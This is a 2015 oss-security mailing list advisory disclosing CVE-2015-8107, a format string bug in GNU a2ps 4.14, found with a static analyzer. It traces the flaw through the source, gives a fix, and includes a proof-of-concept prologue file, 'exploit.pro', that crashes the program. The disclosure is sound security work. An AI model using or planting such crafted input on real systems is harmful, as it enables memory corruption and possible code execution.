Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Nov 2015 19:24:18 +0900
From: 김종권 <jgkim@...as.snu.ac.kr>
To: oss-security@...ts.openwall.com
Cc: wslee@...as.snu.ac.kr
Subject: CVE-2015-8107 - a2ps(gnu) v4.14 format string vulnerability

Dear List,

I am writing this to report a format string vulnerability in a2ps. 
(4.14, which is the latest version)
Also I already have been assigned a CVE identifier from MITRE 
"CVE-2015-8107", so I want to make public this vulnerability.

- Target Platform
   Linux
- Target Version
   4.14 (Latest Version)

- Vulnerability description
When user runs a2ps with malicious crafted pro(a2ps prologue) file, an 
attacker can execute arbitrary code.
The function output_file processes the %Expand command in pro file.
The variable `expansion' in the function output_file may hold a 
malicious input string, which can be used as a format argument of vsprintf.

-- Step 1. (ouput.c 524 line)

524     expansion = ((char *)
                          expand_user_string (job, FIRST_FILE (job),
                                (const uchar *) "Expand: requirement",
                                (const uchar *) token));

For instance, the variable expansion will point to the string “%n” when 
a text line "%Expand: %%\n” exists in an input pro file.

-- Step 2. (output.c 525 line)

525    output (dest, expansion);

output() is called in line 525, and the argument `expansion' is used as 
a format string, which can be malicious, as we described in step 1.

-- Step 3. (output.c 873 line)
182    void output (struct output * out, const char *format, ...){
      ...
202   ds_unsafe_cat_vsprintf (out->chunk,format, args);
      ...

The variable format, which can be malicious, can be passed to 
ds_unsafe_cat_vsprintf() in line 202.

-- step 4. (dstring.c 321 line)
321    void ds_unsafe_cat_vsprintf (struct dstring * ds, const char 
*format, va_list args){
       ...
326    vsprintf (ds->content + ds->len, format, args);
       ...

The value of format, which can be malicious, is used as an argument of 
vsprintf in line 326, therefore arbitrary code can be executed.

-- Step 4. Our malicious input
"exploit.pro"
===================================
% -*-postscript-*-
% PostScript Prologue
%
% $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $
%

%
% This file is part of a2ps.
%
% This program is free software; you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3, or (at your option)
% any later version.
%
% This program is distributed in the hope that it will be useful,
% but WITHOUT ANY WARRANTY; without even the implied warranty of
% MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
% GNU General Public License for more details.
%
% You should have received a copy of the GNU General Public License
% along with this program; see the file COPYING.  If not, write to
% the Free Software Foundation, 59 Temple Place - Suite 330,
% Boston, MA 02111-1307, USA.
%
Documentation
The layout is the same as samp(bw)samp, but alternating gray and white 
lines.
There are two macros defining the behavior:
samp(pro.matrix.cycle)samp defines the length of the cycle (number of white
and gray lines).  It defaults to 6.
samp(pro.matrix.gray)samp defines the number of gray lines. Default is 3.
EndDocumentation
% -- code follows this line --
%%IncludeResource: file base.ps
%%IncludeResource: file a2ps.hdr
%%BeginResource: procset a2ps-matrix-Prolog 2.0 1

% Function T(ab), jumps to the n-th tabulation in the current line
/T {
  cw mul x0 add y0 moveto
} bind def

% Function n: move to the next line
/n { %def
  /y0 y0 bfs sub store
  % Draw a grey background
  /nline nline 1 add def
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
% @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@
%Expand: %%n
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

%Expand:  nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge {
    gsave
      newpath
      x v get y0 currentfont /Descent get currentfontsize mul add moveto
      pw 0 rlineto
      0 bfs rlineto
      pw neg 0 rlineto
      closepath
      0.9 setgray
      fill
    grestore
  } if
  x0 y0 moveto
} bind def

% Function N: show and move to the next line
/N {
  Show
  n
} bind def

/S {
  Show
} bind def

/p {
  false UL
  false BX
%Face: Plain Courier bfs
  Show
} bind def

/sy {
  false UL
  false BX
%Face: Symbol Symbol bfs
  Show
} bind def

/k {
  false UL
  false BX
%Face: Keyword Courier-Oblique bfs
  Show
} bind def

/K {
  false UL
  false BX
%Face: Keyword_strong Courier-Bold bfs
  Show
} bind def

/c {
  false UL
  false BX
%Face: Comment Courier-Oblique bfs
  Show
} bind def

/C {
  false UL
  false BX
%Face: Comment_strong Courier-BoldOblique bfs
  Show
} bind def

/l {
  false UL
  false BX
%Face: Label Helvetica bfs
  Show
} bind def

/L {
  false UL
  false BX
%Face: Label_strong Helvetica-Bold bfs
  Show
} bind def

/str{
  false UL
  false BX
%Face: String Times-Roman bfs
  Show
} bind def

/e{
  false UL
  true BX
%Face: Error Helvetica-Bold bfs
  Show
} bind def

%%EndResource
%%BeginSetup
% The font for line numbering
/f# /Helvetica findfont bfs .6 mul scalefont def
/nline 0 def
%%EndSetup
===================================

Execute
===================================
~ $ a2ps --version
GNU a2ps 4.14
Written by Akim Demaille, Miguel Santana.

Copyright (c) 1988-1993 Miguel Santana
Copyright (c) 1995-2000 Akim Demaille, Miguel Santana
Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

~ $ a2ps --prologue=exploit test.tex -o test.ps
aborted (core dumped)
===================================

- How to fix
(output.c 525 line)
525    output (dest, expansion); ===> output (dest, "%s", expansion);

- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug. 
Our analyzer reported an alarm in a2ps dstring.c 326 line, So we looked 
for a a2ps source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the 
absence of fatal bugs in C source. Sparrow is designed by Abstract 
Interpretation and the analysis is sound in design. Sparrow adopts a 
number of well-founded static analysis techniques[2,3] for scalability, 
precision, and user convenience.

References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo 
Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like 
Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun 
Yi. PLDI'12

Sincerely, Woosuk Lee & Jong-Gwon Kim

-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) wslee@...as.snu.ac.kr
-----------------------------
-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) jgkim@...as.snu.ac.kr
-----------------------------

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.